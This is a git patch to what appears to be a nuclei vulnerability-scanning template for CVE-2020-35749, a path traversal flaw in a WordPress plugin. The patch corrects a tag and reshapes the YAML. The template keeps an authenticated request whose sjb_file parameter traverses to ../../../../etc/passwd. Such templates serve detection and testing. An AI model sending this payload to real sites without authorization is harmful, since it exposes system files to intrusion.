From 8664885b453cd67986f26989f9995427d1cffb1a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 9 Feb 2022 00:13:40 +0530 Subject: [PATCH] Update CVE-2020-35749.yaml --- cves/2020/CVE-2020-35749.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml index 32ba707b50..94c2be7907 100644 --- a/cves/2020/CVE-2020-35749.yaml +++ b/cves/2020/CVE-2020-35749.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated + tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated requests: - raw: @@ -25,11 +25,9 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: @@ -39,4 +37,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200